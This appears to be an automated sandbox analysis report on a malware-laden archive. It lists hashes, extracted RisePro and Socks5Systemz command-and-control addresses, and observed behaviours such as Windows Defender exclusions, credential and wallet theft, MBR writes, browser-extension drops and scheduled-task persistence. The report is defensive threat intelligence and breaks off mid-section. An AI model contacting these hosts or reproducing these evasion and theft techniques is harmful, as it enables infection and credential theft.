Analysis
-
max time kernel
441s -
max time network
448s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
15-06-2024 20:50
Static task
static1
Behavioral task
behavioral1
Sample
file.rar
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
amdhip64.dll
Resource
win7-20240611-en
Behavioral task
behavioral3
Sample
concrt140.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
msvcp140.dll
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
res_mods/1.23.0.0/scripts/client/gui/mods/mod_a.pyc
Resource
win7-20240611-en
Behavioral task
behavioral6
Sample
setup.exe
Resource
win7-20240508-en
General
-
Target
file.rar
-
Size
8.8MB
-
MD5
3443deb58509fdef6b491faecb2af7c3
-
SHA1
06a8d45a279f1b5bccb37f20f1d0551860aa1849
-
SHA256
0e1dc7a84177af8d5ce9df7049e6fbd7ee7c4acf65e4e882383baa343700a85b
-
SHA512
d5a43c37257c045b69c4316cced0a50b32386560851710c82549b3e5b342db090168d4563a5272814e5a1399486b74f4bc3fc2723ec553577cb34fdf3bd981fa
-
SSDEEP
196608:ulofIzfDC8WqVrQT4tzXXg83wb0MCKFu46X9PckOeIXhGQN:u3TN3A83gKK84OHOeEN
Malware Config
Extracted
risepro
147.45.47.126:58709
Extracted
socks5systemz
csgsnhz.net
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c645db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a6f8af714c0ee92
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12eab517aa5c96bd86ec928644825a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b616e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff810c8eb9d9f3bcc68
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exesvchost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vZXYUjRGERiGC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jgefCrdckMUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jbywMxbyABuU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TGSqLNfOU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jbywMxbyABuU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vZXYUjRGERiGC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tvOexZGeSXRtrQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TGSqLNfOU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jgefCrdckMUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tvOexZGeSXRtrQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\SysWOW64\vmffvbwj = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 215 2684 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepid process 1564 powershell.exe 2964 powershell.exe 2712 powershell.exe 1524 powershell.exe 1660 powershell.exe 2532 powershell.exe 2616 powershell.exe 3032 powershell.exe 2548 powershell.EXE 2112 powershell.exe 2176 powershell.exe 2176 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 3060 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\vmffvbwj\ImagePath = "C:\\Windows\\SysWOW64\\vmffvbwj\\hkdooxyy.exe" svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setup.exefw6AeST27Bm2vlk0DxSBSQX2.exeaj2A10.exePwhrnod.exehVUcgSG.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation fw6AeST27Bm2vlk0DxSBSQX2.exe Key value queried \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation aj2A10.exe Key value queried \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation Pwhrnod.exe Key value queried \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation hVUcgSG.exe -
Executes dropped EXE 25 IoCs
Processes:
setup.exesetup.exeHZCRf2RVpwaPOKWoRBM82pMK.exejNFCat12JprTAJuHReQN2XR8.exe2Bieq5wNDNkAsJ0rFBlk_AlN.exePus3tCSrefwVPztCKhp87ihX.exef2hEJNjebYbdDHdjR8ZZyQ9Q.exeQsEZf7p3mqmJQ7IoFER23P5U.exefw6AeST27Bm2vlk0DxSBSQX2.exeDH8573Md6ciWRCrzNsLgNn0N.exeDH8573Md6ciWRCrzNsLgNn0N.tmpInstall.exeInstall.exeaj2A10.exesvomediaplayer32.exebkqtzupkspiy.exesvomediaplayer32.exehkdooxyy.exealRnUJb.exeDBKKFHIEGD.exeBFHJECAAAF.exePwhrnod.exealRnUJb.exehVUcgSG.exepid process 2808 setup.exe 956 setup.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe 2176 2Bieq5wNDNkAsJ0rFBlk_AlN.exe 2168 Pus3tCSrefwVPztCKhp87ihX.exe 1716 f2hEJNjebYbdDHdjR8ZZyQ9Q.exe 2976 QsEZf7p3mqmJQ7IoFER23P5U.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 848 DH8573Md6ciWRCrzNsLgNn0N.exe 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 2868 Install.exe 592 Install.exe 1960 aj2A10.exe 1548 svomediaplayer32.exe 460 1464 bkqtzupkspiy.exe 2364 svomediaplayer32.exe 1532 hkdooxyy.exe 640 alRnUJb.exe 2688 DBKKFHIEGD.exe 700 BFHJECAAAF.exe 1548 Pwhrnod.exe 2784 alRnUJb.exe 1272 hVUcgSG.exe -
Loads dropped DLL 64 IoCs
Processes:
taskmgr.exesetup.exeHZCRf2RVpwaPOKWoRBM82pMK.exeDH8573Md6ciWRCrzNsLgNn0N.exeDH8573Md6ciWRCrzNsLgNn0N.tmpfw6AeST27Bm2vlk0DxSBSQX2.exeInstall.exeInstall.exeaj2A10.exeMSBuild.exeWerFault.exepid process 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1736 taskmgr.exe 1736 taskmgr.exe 1188 1736 taskmgr.exe 1736 taskmgr.exe 2808 setup.exe 2808 setup.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 1736 taskmgr.exe 1736 taskmgr.exe 848 DH8573Md6ciWRCrzNsLgNn0N.exe 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 2868 Install.exe 2868 Install.exe 2868 Install.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 2868 Install.exe 592 Install.exe 592 Install.exe 592 Install.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 460 1736 taskmgr.exe 1736 taskmgr.exe 1088 MSBuild.exe 1088 MSBuild.exe 1088 MSBuild.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1088 MSBuild.exe 1088 MSBuild.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 141.98.234.31 -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" jNFCat12JprTAJuHReQN2XR8.exe -
Checks for any installed AV software in registry 1 TTPs 4 IoCs
Processes:
fw6AeST27Bm2vlk0DxSBSQX2.exeaj2A10.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast fw6AeST27Bm2vlk0DxSBSQX2.exe Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\AVAST Software\Avast fw6AeST27Bm2vlk0DxSBSQX2.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast aj2A10.exe Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\AVAST Software\Avast aj2A10.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
Pwhrnod.exehVUcgSG.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json Pwhrnod.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json Pwhrnod.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json hVUcgSG.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 api.myip.com 6 api.myip.com 11 ipinfo.io 12 ipinfo.io 92 ipinfo.io 94 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
f2hEJNjebYbdDHdjR8ZZyQ9Q.exeaj2A10.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 f2hEJNjebYbdDHdjR8ZZyQ9Q.exe File opened for modification \??\PhysicalDrive0 aj2A10.exe -
Drops file in System32 directory 35 IoCs
Processes:
setup.exepowershell.exepowershell.exepowershell.exehVUcgSG.exepowershell.exesvchost.exealRnUJb.exepowershell.exePwhrnod.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat hVUcgSG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol alRnUJb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Pwhrnod.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 Pwhrnod.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E Pwhrnod.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 Pwhrnod.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Pwhrnod.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Pwhrnod.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hVUcgSG.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini alRnUJb.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 Pwhrnod.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exepid process 2272 jNFCat12JprTAJuHReQN2XR8.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
bkqtzupkspiy.exeQsEZf7p3mqmJQ7IoFER23P5U.exehkdooxyy.exedescription pid process target process PID 1464 set thread context of 1104 1464 bkqtzupkspiy.exe conhost.exe PID 1464 set thread context of 3020 1464 bkqtzupkspiy.exe svchost.exe PID 2976 set thread context of 1088 2976 QsEZf7p3mqmJQ7IoFER23P5U.exe MSBuild.exe PID 1532 set thread context of 2924 1532 hkdooxyy.exe svchost.exe -
Drops file in Program Files directory 24 IoCs
Processes:
Pwhrnod.exehVUcgSG.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak Pwhrnod.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja Pwhrnod.exe File created C:\Program Files (x86)\TGSqLNfOU\mLutPpa.xml Pwhrnod.exe File created C:\Program Files (x86)\TGSqLNfOU\fojvEjJ.xml hVUcgSG.exe File created C:\Program Files (x86)\vZXYUjRGERiGC\LqbEsou.xml Pwhrnod.exe File created C:\Program Files (x86)\jgefCrdckMUn\BDCiTWp.dll Pwhrnod.exe File created C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\FMnGMxT.dll hVUcgSG.exe File created C:\Program Files (x86)\vZXYUjRGERiGC\uxeimXa.xml hVUcgSG.exe File created C:\Program Files (x86)\TGSqLNfOU\NDYUDM.dll Pwhrnod.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi Pwhrnod.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi Pwhrnod.exe File created C:\Program Files (x86)\jbywMxbyABuU2\yldDABG.xml Pwhrnod.exe File created C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\oOEgyeT.xml Pwhrnod.exe File created C:\Program Files (x86)\vZXYUjRGERiGC\fZSTmyp.dll Pwhrnod.exe File created C:\Program Files (x86)\jbywMxbyABuU2\ULzMSFLzdmVBB.dll hVUcgSG.exe File created C:\Program Files (x86)\vZXYUjRGERiGC\uPRYhJX.dll hVUcgSG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hVUcgSG.exe File created C:\Program Files (x86)\jbywMxbyABuU2\eYEkLFX.xml hVUcgSG.exe File created C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\cSuranC.xml hVUcgSG.exe File created C:\Program Files (x86)\TGSqLNfOU\LMFzmB.dll hVUcgSG.exe File created C:\Program Files (x86)\jbywMxbyABuU2\ENSDNYJUUDyMN.dll Pwhrnod.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hVUcgSG.exe File created C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\WxLWWEL.dll Pwhrnod.exe File created C:\Program Files (x86)\jgefCrdckMUn\CZncWNZ.dll hVUcgSG.exe -
Drops file in Windows directory 6 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\WEqRGXvoovdTvsnPk.job schtasks.exe File created C:\Windows\Tasks\bKPbLIPtdWjYWtgKbM.job schtasks.exe File created C:\Windows\Tasks\LyeaCXeAXIXykqmfO.job schtasks.exe File created C:\Windows\Tasks\rkutRMUCKyfxaPV.job schtasks.exe File opened for modification C:\Windows\Tasks\LyeaCXeAXIXykqmfO.job schtasks.exe File opened for modification C:\Windows\Tasks\rkutRMUCKyfxaPV.job schtasks.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2408 sc.exe 2052 sc.exe 2092 sc.exe 612 sc.exe 2480 sc.exe 1768 sc.exe 1568 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1956 2688 WerFault.exe DBKKFHIEGD.exe 2504 700 WerFault.exe BFHJECAAAF.exe 836 640 WerFault.exe alRnUJb.exe 3008 2784 WerFault.exe alRnUJb.exe 2500 592 WerFault.exe Install.exe 1184 1548 WerFault.exe Pwhrnod.exe 2164 1272 WerFault.exe hVUcgSG.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
jNFCat12JprTAJuHReQN2XR8.exeMSBuild.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 jNFCat12JprTAJuHReQN2XR8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString jNFCat12JprTAJuHReQN2XR8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
